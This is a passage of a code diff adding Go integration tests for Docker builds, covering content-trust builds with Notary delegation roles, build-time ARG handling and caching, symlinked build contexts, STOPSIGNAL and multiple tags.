+	dockerFile := fmt.Sprintf(`
+  FROM %s
+  RUN []
+    `, repoName)
+
+	name := "testtrustedbuild"
+
+	buildCmd := buildImageCmd(name, dockerFile, true)
+	s.trustedCmd(buildCmd)
+	out, _, err := runCommandWithOutput(buildCmd)
+	if err != nil {
+		c.Fatalf("Error running trusted build: %s\n%s", err, out)
+	}
+
+	if !strings.Contains(out, fmt.Sprintf("FROM %s@sha", repoName[:len(repoName)-7])) {
+		c.Fatalf("Unexpected output on trusted build:\n%s", out)
+	}
+
+	// We should also have a tag reference for the image.
+	if out, exitCode := dockerCmd(c, "inspect", repoName); exitCode != 0 {
+		c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out)
+	}
+
+	// We should now be able to remove the tag reference.
+	if out, exitCode := dockerCmd(c, "rmi", repoName); exitCode != 0 {
+		c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out)
+	}
+}
+
+func (s *DockerTrustSuite) TestTrustedBuildUntrustedTag(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/build-untrusted-tag:latest", privateRegistryURL)
+	dockerFile := fmt.Sprintf(`
+  FROM %s
+  RUN []
+    `, repoName)
+
+	name := "testtrustedbuilduntrustedtag"
+
+	buildCmd := buildImageCmd(name, dockerFile, true)
+	s.trustedCmd(buildCmd)
+	out, _, err := runCommandWithOutput(buildCmd)
+	if err == nil {
+		c.Fatalf("Expected error on trusted build with untrusted tag: %s\n%s", err, out)
+	}
+
+	if !strings.Contains(out, "does not have trust data for") {
+		c.Fatalf("Unexpected output on trusted build with untrusted tag:\n%s", out)
+	}
+}
+
+func (s *DockerTrustSuite) TestBuildContextDirIsSymlink(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	tempDir, err := ioutil.TempDir("", "test-build-dir-is-symlink-")
+	c.Assert(err, check.IsNil)
+	defer os.RemoveAll(tempDir)
+
+	// Make a real context directory in this temp directory with a simple
+	// Dockerfile.
+	realContextDirname := filepath.Join(tempDir, "context")
+	if err := os.Mkdir(realContextDirname, os.FileMode(0755)); err != nil {
+		c.Fatal(err)
+	}
+
+	if err = ioutil.WriteFile(
+		filepath.Join(realContextDirname, "Dockerfile"),
+		[]byte(`
+			FROM busybox
+			RUN echo hello world
+		`),
+		os.FileMode(0644),
+	); err != nil {
+		c.Fatal(err)
+	}
+
+	// Make a symlink to the real context directory.
+	contextSymlinkName := filepath.Join(tempDir, "context_link")
+	if err := os.Symlink(realContextDirname, contextSymlinkName); err != nil {
+		c.Fatal(err)
+	}
+
+	// Executing the build with the symlink as the specified context should
+	// *not* fail.
+	if out, exitStatus := dockerCmd(c, "build", contextSymlinkName); exitStatus != 0 {
+		c.Fatalf("build failed with exit status %d: %s", exitStatus, out)
+	}
+}
+
+func (s *DockerTrustSuite) TestTrustedBuildTagFromReleasesRole(c *check.C) {
+	testRequires(c, NotaryHosting)
+
+	latestTag := s.setupTrustedImage(c, "trusted-build-releases-role")
+	repoName := strings.TrimSuffix(latestTag, ":latest")
+
+	// Now create the releases role
+	s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public)
+	s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private)
+	s.notaryPublish(c, repoName)
+
+	// push a different tag to the releases role
+	otherTag := fmt.Sprintf("%s:other", repoName)
+	dockerCmd(c, "tag", "busybox", otherTag)
+
+	pushCmd := exec.Command(dockerBinary, "push", otherTag)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out))
+	s.assertTargetInRoles(c, repoName, "other", "targets/releases")
+	s.assertTargetNotInRoles(c, repoName, "other", "targets")
+
+	out, status := dockerCmd(c, "rmi", otherTag)
+	c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out))
+
+	dockerFile := fmt.Sprintf(`
+  FROM %s
+  RUN []
+    `, otherTag)
+
+	name := "testtrustedbuildreleasesrole"
+
+	buildCmd := buildImageCmd(name, dockerFile, true)
+	s.trustedCmd(buildCmd)
+	out, _, err = runCommandWithOutput(buildCmd)
+	c.Assert(err, check.IsNil, check.Commentf("Trusted build failed: %s", out))
+	c.Assert(out, checker.Contains, fmt.Sprintf("FROM %s@sha", repoName))
+}
+
+func (s *DockerTrustSuite) TestTrustedBuildTagIgnoresOtherDelegationRoles(c *check.C) {
+	testRequires(c, NotaryHosting)
+
+	latestTag := s.setupTrustedImage(c, "trusted-build-releases-role")
+	repoName := strings.TrimSuffix(latestTag, ":latest")
+
+	// Now create a non-releases delegation role
+	s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public)
+	s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private)
+	s.notaryPublish(c, repoName)
+
+	// push a different tag to the other role
+	otherTag := fmt.Sprintf("%s:other", repoName)
+	dockerCmd(c, "tag", "busybox", otherTag)
+
+	pushCmd := exec.Command(dockerBinary, "push", otherTag)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out))
+	s.assertTargetInRoles(c, repoName, "other", "targets/other")
+	s.assertTargetNotInRoles(c, repoName, "other", "targets")
+
+	out, status := dockerCmd(c, "rmi", otherTag)
+	c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out))
+
+	dockerFile := fmt.Sprintf(`
+  FROM %s
+  RUN []
+    `, otherTag)
+
+	name := "testtrustedbuildotherrole"
+
+	buildCmd := buildImageCmd(name, dockerFile, true)
+	s.trustedCmd(buildCmd)
+	out, _, err = runCommandWithOutput(buildCmd)
+	c.Assert(err, check.NotNil, check.Commentf("Trusted build expected to fail: %s", out))
+}
+
+// Issue #15634: COPY fails when path starts with "null"
+func (s *DockerSuite) TestBuildNullStringInAddCopyVolume(c *check.C) {
+	name := "testbuildnullstringinaddcopyvolume"
+
+	volName := "nullvolume"
+
+	if daemonPlatform == "windows" {
+		volName = `C:\\nullvolume`
+	}
+
+	ctx, err := fakeContext(`
+		FROM busybox
+
+		ADD null /
+		COPY nullfile /
+		VOLUME `+volName+`
+		`,
+		map[string]string{
+			"null":     "test1",
+			"nullfile": "test2",
+		},
+	)
+	c.Assert(err, check.IsNil)
+	defer ctx.Close()
+
+	_, err = buildImageFromContext(name, ctx, true)
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestBuildStopSignal(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support STOPSIGNAL yet
+	imgName := "test_build_stop_signal"
+	_, err := buildImage(imgName,
+		`FROM busybox
+		 STOPSIGNAL SIGKILL`,
+		true)
+	c.Assert(err, check.IsNil)
+	res := inspectFieldJSON(c, imgName, "Config.StopSignal")
+	if res != `"SIGKILL"` {
+		c.Fatalf("Signal %s, expected SIGKILL", res)
+	}
+
+	containerName := "test-container-stop-signal"
+	dockerCmd(c, "run", "-d", "--name", containerName, imgName, "top")
+
+	res = inspectFieldJSON(c, containerName, "Config.StopSignal")
+	if res != `"SIGKILL"` {
+		c.Fatalf("Signal %s, expected SIGKILL", res)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArg(c *check.C) {
+	imgName := "bldargtest"
+	envKey := "foo"
+	envVal := "bar"
+	args := []string{"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)}
+	var dockerfile string
+	if daemonPlatform == "windows" {
+		// Bugs in Windows busybox port - use the default base image and native cmd stuff
+		dockerfile = fmt.Sprintf(`FROM `+minimalBaseImage()+`
+			ARG %s
+			RUN echo %%%s%%
+			CMD setlocal enableextensions && if defined %s (echo %%%s%%)`, envKey, envKey, envKey, envKey)
+	} else {
+		dockerfile = fmt.Sprintf(`FROM busybox
+			ARG %s
+			RUN echo $%s
+			CMD echo $%s`, envKey, envKey, envKey)
+
+	}
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) {
+		if err != nil {
+			c.Fatalf("build failed to complete: %q %q", out, err)
+		}
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal)
+	}
+
+	containerName := "bldargCont"
+	out, _ := dockerCmd(c, "run", "--name", containerName, imgName)
+	out = strings.Trim(out, " \r\n'")
+	if out != "" {
+		c.Fatalf("run produced invalid output: %q, expected empty string", out)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgHistory(c *check.C) {
+	imgName := "bldargtest"
+	envKey := "foo"
+	envVal := "bar"
+	envDef := "bar1"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+	}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG %s=%s`, envKey, envDef)
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) {
+		if err != nil {
+			c.Fatalf("build failed to complete: %q %q", out, err)
+		}
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal)
+	}
+
+	out, _ := dockerCmd(c, "history", "--no-trunc", imgName)
+	outputTabs := strings.Split(out, "\n")[1]
+	if !strings.Contains(outputTabs, envDef) {
+		c.Fatalf("failed to find arg default in image history output: %q expected: %q", outputTabs, envDef)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgCacheHit(c *check.C) {
+	imgName := "bldargtest"
+	envKey := "foo"
+	envVal := "bar"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+	}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG %s
+		RUN echo $%s`, envKey, envKey)
+
+	origImgID := ""
+	var err error
+	if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil {
+		c.Fatal(err)
+	}
+
+	imgNameCache := "bldargtestcachehit"
+	if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID != origImgID {
+		if err != nil {
+			c.Fatal(err)
+		}
+		c.Fatalf("build didn't use cache! expected image id: %q built image id: %q", origImgID, newImgID)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgCacheMissExtraArg(c *check.C) {
+	imgName := "bldargtest"
+	envKey := "foo"
+	envVal := "bar"
+	extraEnvKey := "foo1"
+	extraEnvVal := "bar1"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+	}
+
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG %s
+		ARG %s
+		RUN echo $%s`, envKey, extraEnvKey, envKey)
+
+	origImgID := ""
+	var err error
+	if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil {
+		c.Fatal(err)
+	}
+
+	imgNameCache := "bldargtestcachemiss"
+	args = append(args, "--build-arg", fmt.Sprintf("%s=%s", extraEnvKey, extraEnvVal))
+	if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID {
+		if err != nil {
+			c.Fatal(err)
+		}
+		c.Fatalf("build used cache, expected a miss!")
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgCacheMissSameArgDiffVal(c *check.C) {
+	imgName := "bldargtest"
+	envKey := "foo"
+	envVal := "bar"
+	newEnvVal := "bar1"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+	}
+
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG %s
+		RUN echo $%s`, envKey, envKey)
+
+	origImgID := ""
+	var err error
+	if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil {
+		c.Fatal(err)
+	}
+
+	imgNameCache := "bldargtestcachemiss"
+	args = []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, newEnvVal),
+	}
+	if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID {
+		if err != nil {
+			c.Fatal(err)
+		}
+		c.Fatalf("build used cache, expected a miss!")
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgOverrideArgDefinedBeforeEnv(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support ARG
+	imgName := "bldargtest"
+	envKey := "foo"
+	envVal := "bar"
+	envValOveride := "barOverride"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+	}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG %s
+		ENV %s %s
+		RUN echo $%s
+		CMD echo $%s
+        `, envKey, envKey, envValOveride, envKey, envKey)
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 {
+		if err != nil {
+			c.Fatalf("build failed to complete: %q %q", out, err)
+		}
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride)
+	}
+
+	containerName := "bldargCont"
+	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) {
+		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgOverrideEnvDefinedBeforeArg(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support ARG
+	imgName := "bldargtest"
+	envKey := "foo"
+	envVal := "bar"
+	envValOveride := "barOverride"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+	}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ENV %s %s
+		ARG %s
+		RUN echo $%s
+		CMD echo $%s
+        `, envKey, envValOveride, envKey, envKey, envKey)
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 {
+		if err != nil {
+			c.Fatalf("build failed to complete: %q %q", out, err)
+		}
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride)
+	}
+
+	containerName := "bldargCont"
+	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) {
+		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support ARG
+	imgName := "bldvarstest"
+
+	wdVar := "WDIR"
+	wdVal := "/tmp/"
+	addVar := "AFILE"
+	addVal := "addFile"
+	copyVar := "CFILE"
+	copyVal := "copyFile"
+	envVar := "foo"
+	envVal := "bar"
+	exposeVar := "EPORT"
+	exposeVal := "9999"
+	userVar := "USER"
+	userVal := "testUser"
+	volVar := "VOL"
+	volVal := "/testVol/"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", wdVar, wdVal),
+		"--build-arg", fmt.Sprintf("%s=%s", addVar, addVal),
+		"--build-arg", fmt.Sprintf("%s=%s", copyVar, copyVal),
+		"--build-arg", fmt.Sprintf("%s=%s", envVar, envVal),
+		"--build-arg", fmt.Sprintf("%s=%s", exposeVar, exposeVal),
+		"--build-arg", fmt.Sprintf("%s=%s", userVar, userVal),
+		"--build-arg", fmt.Sprintf("%s=%s", volVar, volVal),
+	}
+	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+		ARG %s
+		WORKDIR ${%s}
+		ARG %s
+		ADD ${%s} testDir/
+		ARG %s
+		COPY $%s testDir/
+		ARG %s
+		ENV %s=${%s}
+		ARG %s
+		EXPOSE $%s
+		ARG %s
+		USER $%s
+		ARG %s
+		VOLUME ${%s}`,
+		wdVar, wdVar, addVar, addVar, copyVar, copyVar, envVar, envVar,
+		envVar, exposeVar, exposeVar, userVar, userVar, volVar, volVar),
+		map[string]string{
+			addVal:  "some stuff",
+			copyVal: "some stuff",
+		})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	if _, err := buildImageFromContext(imgName, ctx, true, args...); err != nil {
+		c.Fatal(err)
+	}
+
+	var resMap map[string]interface{}
+	var resArr []string
+	res := ""
+	res = inspectField(c, imgName, "Config.WorkingDir")
+	if res != filepath.ToSlash(filepath.Clean(wdVal)) {
+		c.Fatalf("Config.WorkingDir value mismatch. Expected: %s, got: %s", filepath.ToSlash(filepath.Clean(wdVal)), res)
+	}
+
+	inspectFieldAndMarshall(c, imgName, "Config.Env", &resArr)
+
+	found := false
+	for _, v := range resArr {
+		if fmt.Sprintf("%s=%s", envVar, envVal) == v {
+			found = true
+			break
+		}
+	}
+	if !found {
+		c.Fatalf("Config.Env value mismatch. Expected <key=value> to exist: %s=%s, got: %v",
+			envVar, envVal, resArr)
+	}
+
+	inspectFieldAndMarshall(c, imgName, "Config.ExposedPorts", &resMap)
+	if _, ok := resMap[fmt.Sprintf("%s/tcp", exposeVal)]; !ok {
+		c.Fatalf("Config.ExposedPorts value mismatch. Expected exposed port: %s/tcp, got: %v", exposeVal, resMap)
+	}
+
+	res = inspectField(c, imgName, "Config.User")
+	if res != userVal {
+		c.Fatalf("Config.User value mismatch. Expected: %s, got: %s", userVal, res)
+	}
+
+	inspectFieldAndMarshall(c, imgName, "Config.Volumes", &resMap)
+	if _, ok := resMap[volVal]; !ok {
+		c.Fatalf("Config.Volumes value mismatch. Expected volume: %s, got: %v", volVal, resMap)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgExpansionOverride(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support ARG
+	imgName := "bldvarstest"
+	envKey := "foo"
+	envVal := "bar"
+	envKey1 := "foo1"
+	envValOveride := "barOverride"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+	}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG %s
+		ENV %s %s
+		ENV %s ${%s}
+		RUN echo $%s
+		CMD echo $%s`, envKey, envKey, envValOveride, envKey1, envKey, envKey1, envKey1)
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 {
+		if err != nil {
+			c.Fatalf("build failed to complete: %q %q", out, err)
+		}
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride)
+	}
+
+	containerName := "bldargCont"
+	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) {
+		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgUntrustedDefinedAfterUse(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support ARG
+	imgName := "bldargtest"
+	envKey := "foo"
+	envVal := "bar"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+	}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		RUN echo $%s
+		ARG %s
+		CMD echo $%s`, envKey, envKey, envKey)
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Contains(out, envVal) {
+		if err != nil {
+			c.Fatalf("build failed to complete: %q %q", out, err)
+		}
+		c.Fatalf("able to access environment variable in output: %q expected to be missing", out)
+	}
+
+	containerName := "bldargCont"
+	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); out != "\n" {
+		c.Fatalf("run produced invalid output: %q, expected empty string", out)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgBuiltinArg(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support --build-arg
+	imgName := "bldargtest"
+	envKey := "HTTP_PROXY"
+	envVal := "bar"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+	}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		RUN echo $%s
+		CMD echo $%s`, envKey, envKey)
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) {
+		if err != nil {
+			c.Fatalf("build failed to complete: %q %q", out, err)
+		}
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal)
+	}
+
+	containerName := "bldargCont"
+	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); out != "\n" {
+		c.Fatalf("run produced invalid output: %q, expected empty string", out)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgDefaultOverride(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support ARG
+	imgName := "bldargtest"
+	envKey := "foo"
+	envVal := "bar"
+	envValOveride := "barOverride"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, envValOveride),
+	}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG %s=%s
+		ENV %s $%s
+		RUN echo $%s
+		CMD echo $%s`, envKey, envVal, envKey, envKey, envKey, envKey)
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 1 {
+		if err != nil {
+			c.Fatalf("build failed to complete: %q %q", out, err)
+		}
+		c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride)
+	}
+
+	containerName := "bldargCont"
+	if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) {
+		c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgUnconsumedArg(c *check.C) {
+	imgName := "bldargtest"
+	envKey := "foo"
+	envVal := "bar"
+	args := []string{
+		"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal),
+	}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		RUN echo $%s
+		CMD echo $%s`, envKey, envKey)
+
+	warnStr := "[Warning] One or more build-args"
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); !strings.Contains(out, warnStr) {
+		c.Fatalf("build completed without warning: %q %q", out, err)
+	} else if err != nil {
+		c.Fatalf("build failed to complete: %q %q", out, err)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgEnv(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support ARG
+	args := []string{
+		"build",
+		"--build-arg", fmt.Sprintf("FOO1=fromcmd"),
+		"--build-arg", fmt.Sprintf("FOO2="),
+		"--build-arg", fmt.Sprintf("FOO3"), // set in env
+		"--build-arg", fmt.Sprintf("FOO4"), // not set in env
+		"--build-arg", fmt.Sprintf("FOO5=fromcmd"),
+		// FOO6 is not set at all
+		"--build-arg", fmt.Sprintf("FOO7=fromcmd"), // should produce a warning
+		"--build-arg", fmt.Sprintf("FOO8="), // should produce a warning
+		"--build-arg", fmt.Sprintf("FOO9"), // should produce a warning
+		".",
+	}
+
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG FOO1=fromfile
+		ARG FOO2=fromfile
+		ARG FOO3=fromfile
+		ARG FOO4=fromfile
+		ARG FOO5
+		ARG FOO6
+		RUN env
+		RUN [ "$FOO1" == "fromcmd" ]
+		RUN [ "$FOO2" == "" ]
+		RUN [ "$FOO3" == "fromenv" ]
+		RUN [ "$FOO4" == "fromfile" ]
+		RUN [ "$FOO5" == "fromcmd" ]
+		# The following should not exist at all in the env
+		RUN [ "$(env | grep FOO6)" == "" ]
+		RUN [ "$(env | grep FOO7)" == "" ]
+		RUN [ "$(env | grep FOO8)" == "" ]
+		RUN [ "$(env | grep FOO9)" == "" ]
+	    `)
+
+	ctx, err := fakeContext(dockerfile, nil)
+	c.Assert(err, check.IsNil)
+	defer ctx.Close()
+
+	cmd := exec.Command(dockerBinary, args...)
+	cmd.Dir = ctx.Dir
+	cmd.Env = append(os.Environ(),
+		"FOO1=fromenv",
+		"FOO2=fromenv",
+		"FOO3=fromenv")
+	out, _, err := runCommandWithOutput(cmd)
+	if err != nil {
+		c.Fatal(err, out)
+	}
+
+	// Now check to make sure we got a warning msg about unused build-args
+	i := strings.Index(out, "[Warning]")
+	if i < 0 {
+		c.Fatalf("Missing the build-arg warning in %q", out)
+	}
+
+	out = out[i:] // "out" should contain just the warning message now
+
+	// These were specified on a --build-arg but no ARG was in the Dockerfile
+	c.Assert(out, checker.Contains, "FOO7")
+	c.Assert(out, checker.Contains, "FOO8")
+	c.Assert(out, checker.Contains, "FOO9")
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgQuotedValVariants(c *check.C) {
+	imgName := "bldargtest"
+	envKey := "foo"
+	envKey1 := "foo1"
+	envKey2 := "foo2"
+	envKey3 := "foo3"
+	args := []string{}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG %s=""
+		ARG %s=''
+		ARG %s="''"
+		ARG %s='""'
+		RUN [ "$%s" != "$%s" ]
+		RUN [ "$%s" != "$%s" ]
+		RUN [ "$%s" != "$%s" ]
+		RUN [ "$%s" != "$%s" ]
+		RUN [ "$%s" != "$%s" ]`, envKey, envKey1, envKey2, envKey3,
+		envKey, envKey2, envKey, envKey3, envKey1, envKey2, envKey1, envKey3,
+		envKey2, envKey3)
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil {
+		c.Fatalf("build failed to complete: %q %q", out, err)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support ARG
+	imgName := "bldargtest"
+	envKey := "foo"
+	envKey1 := "foo1"
+	envKey2 := "foo2"
+	args := []string{}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG %s=
+		ARG %s=""
+		ARG %s=''
+		RUN [ "$%s" == "$%s" ]
+		RUN [ "$%s" == "$%s" ]
+		RUN [ "$%s" == "$%s" ]`, envKey, envKey1, envKey2, envKey, envKey1, envKey1, envKey2, envKey, envKey2)
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil {
+		c.Fatalf("build failed to complete: %q %q", out, err)
+	}
+}
+
+func (s *DockerSuite) TestBuildBuildTimeArgDefintionWithNoEnvInjection(c *check.C) {
+	imgName := "bldargtest"
+	envKey := "foo"
+	args := []string{}
+	dockerfile := fmt.Sprintf(`FROM busybox
+		ARG %s
+		RUN env`, envKey)
+
+	if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envKey) != 1 {
+		if err != nil {
+			c.Fatalf("build failed to complete: %q %q", out, err)
+		}
+		c.Fatalf("unexpected number of occurrences of the arg in output: %q expected: 1", out)
+	}
+}
+
+func (s *DockerSuite) TestBuildNoNamedVolume(c *check.C) {
+	volName := "testname:/foo"
+
+	if daemonPlatform == "windows" {
+		volName = "testname:C:\\foo"
+	}
+	dockerCmd(c, "run", "-v", volName, "busybox", "sh", "-c", "touch /foo/oops")
+
+	dockerFile := `FROM busybox
+	VOLUME ` + volName + `
+	RUN ls /foo/oops
+	`
+	_, err := buildImage("test", dockerFile, false)
+	c.Assert(err, check.NotNil, check.Commentf("image build should have failed"))
+}
+
+func (s *DockerSuite) TestBuildTagEvent(c *check.C) {
+	since := daemonUnixTime(c)
+
+	dockerFile := `FROM busybox
+	RUN echo events
+	`
+	_, err := buildImage("test", dockerFile, false)
+	c.Assert(err, check.IsNil)
+
+	until := daemonUnixTime(c)
+	out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "type=image")
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	actions := eventActionsByIDAndType(c, events, "test:latest", "image")
+	var foundTag bool
+	for _, a := range actions {
+		if a == "tag" {
+			foundTag = true
+			break
+		}
+	}
+
+	c.Assert(foundTag, checker.True, check.Commentf("No tag event found:\n%s", out))
+}
+
+// #15780
+func (s *DockerSuite) TestBuildMultipleTags(c *check.C) {
+	dockerfile := `
+	FROM busybox
+	MAINTAINER test-15780
+	`
+	cmd := exec.Command(dockerBinary, "build", "-t", "tag1", "-t", "tag2:v2",
+		"-t", "tag1:latest", "-t", "tag1", "--no-cache", "-")
+	cmd.Stdin = strings.NewReader(dockerfile)
+	_, err := runCommand(cmd)
+	c.Assert(err, check.IsNil)
+
+	id1, err := getIDByName("tag1")
+	c.Assert(err, check.IsNil)
+	id2, err := getIDByName("tag2:v2")
+	c.Assert(err, check.IsNil)
+	c.Assert(id1, check.Equals, id2)
+}
+
+// #17290
+func (s *DockerSuite) TestBuildCacheBrokenSymlink(c *check.C) {
+	name := "testbuildbrokensymlink"
+	ctx, err := fakeContext(`
+	FROM busybox
+	COPY . ./`,
+		map[string]string{
+			"foo": "bar",
+		})
+	c.Assert(err, checker.IsNil)
+	defer ctx.Close()
+
+	err = os.Symlink(filepath.Join(ctx.Dir, "nosuchfile"), filepath.Join(ctx.Dir, "asymlink"))
+	c.Assert(err, checker.IsNil)
+
+	// warm up cache
+	_, err = buildImageFromContext(name, ctx, true)
+	c.Assert(err, checker.IsNil)
+
+	// add new file to context, should invalidate cache
+	err = ioutil.WriteFile(filepath.Join(ctx.Dir, "newfile"), []byte("foo"), 0644)
+	c.Assert(err, checker.IsNil)
+
+	_, out, err := buildImageFromContextWithOut(name, ctx, true)
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(out, checker.Not(checker.Contains), "Using cache")
+
+}
+
+func (s *DockerSuite) TestBuildFollowSymlinkToFile(c *check.C) {
+	name := "testbuildbrokensymlink"
+	ctx, err := fakeContext(`
+	FROM busybox
+	COPY asymlink target`,
+		map[string]string{
+			"foo": "bar",
+		})
+	c.Assert(err, checker.IsNil)
+	defer ctx.Close()
+
+	err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink"))
+	c.Assert(err, checker.IsNil)
+
+	id, err := buildImageFromContext(name, ctx, true)
+	c.Assert(err, checker.IsNil)
+
+	out, _ := dockerCmd(c, "run", "--rm", id, "cat", "target")
+	c.Assert(out, checker.Matches, "bar")
+
+	// change target file should invalidate cache
+	err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644)
+	c.Assert(err, checker.IsNil)
+
+	id, out, err = buildImageFromContextWithOut(name, ctx, true)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), "Using cache")
+
